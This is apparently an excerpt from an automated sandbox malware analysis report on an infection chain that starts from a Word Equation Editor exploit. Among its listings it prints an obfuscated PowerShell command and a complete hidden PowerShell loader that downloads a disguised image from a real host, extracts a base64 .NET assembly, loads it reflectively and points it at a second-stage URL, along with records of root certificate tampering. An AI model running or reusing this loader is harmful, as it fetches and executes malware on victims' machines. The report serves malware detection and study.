            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp

            Data Obfuscation

            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? 
?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_00129247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect, 19_2_00129247
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 1_2_005401F4 push eax; retf 1_2_005401F5
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 1_2_0054C264 pushad ; retn 0054h 1_2_0054C289
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 1_2_00548EE2 push eax; retf 1_2_00548F61
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 1_2_0055EBB4 push eax; ret 1_2_0055ECAB
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 1_2_0054C3A2 push A00054C4h; ret 1_2_0054C3F5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00555924 push 34010160h; iretd 7_2_0055592D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00552D95 pushad ; ret 7_2_00552D99
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00552DA5 pushfd ; ret 7_2_00552DA9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_0040134A pushfd ; retf 10_2_00401353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_004012F2 pushfd ; retf 10_2_004012F3
            Source: C:\Windows\explorer.exe Code function: 20_2_00061405 push esi; ret 20_2_00061407
            Source: C:\Windows\explorer.exe Code function: 20_2_000647A7 push esp; iretd 20_2_000647A8
            Source: C:\Windows\explorer.exe Code function: 20_2_000614D4 push esi; ret 20_2_000614D6
            Source: C:\Windows\explorer.exe Code function: 20_2_0006A055 push es; iretd 20_2_0006A05D
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 21_2_0008967E push ds; retf 21_2_00089680
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 21_2_000894E6 push edx; ret 21_2_000894E7
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 21_2_000838A7 push esp; iretd 21_2_000838A8
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_000887CE push es; ret 22_2_00088A18
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_00088EEF push edi; ret 22_2_00088EF0
            Source: C:\Windows\explorer.exe Code function: 23_2_00061405 push esi; ret 23_2_00061407
            Source: C:\Windows\explorer.exe Code function: 23_2_000614D4 push esi; ret 23_2_000614D6
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_000C3417 push esp; iretd 24_2_000C3418
            Source: C:\Windows\explorer.exe Code function: 25_2_00061405 push esi; ret 25_2_00061407
            Source: C:\Windows\explorer.exe Code function: 25_2_000645A7 push esp; iretd 25_2_000645A8
            Source: C:\Windows\explorer.exe Code function: 25_2_000614D4 push esi; ret 25_2_000614D6
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 26_2_00083627 push esp; iretd 26_2_00083628
            Source: C:\Windows\explorer.exe Code function: 27_2_00061405 push esi; ret 27_2_00061407
            Source: C:\Windows\explorer.exe Code function: 27_2_000614D4 push esi; ret 27_2_000614D6
            Source: C:\Windows\explorer.exe Code function: 27_2_0006AC8D push esp; iretd 27_2_0006AC95
            Source: C:\Windows\explorer.exe Code function: 27_2_0006AAD2 push ebp; iretd 27_2_0006AAD3

            Persistence and Installation Behavior

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
            Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\gwseuha

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\gwseuha:Zone.Identifier read attributes | delete
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_00083862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, 22_2_00083862
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
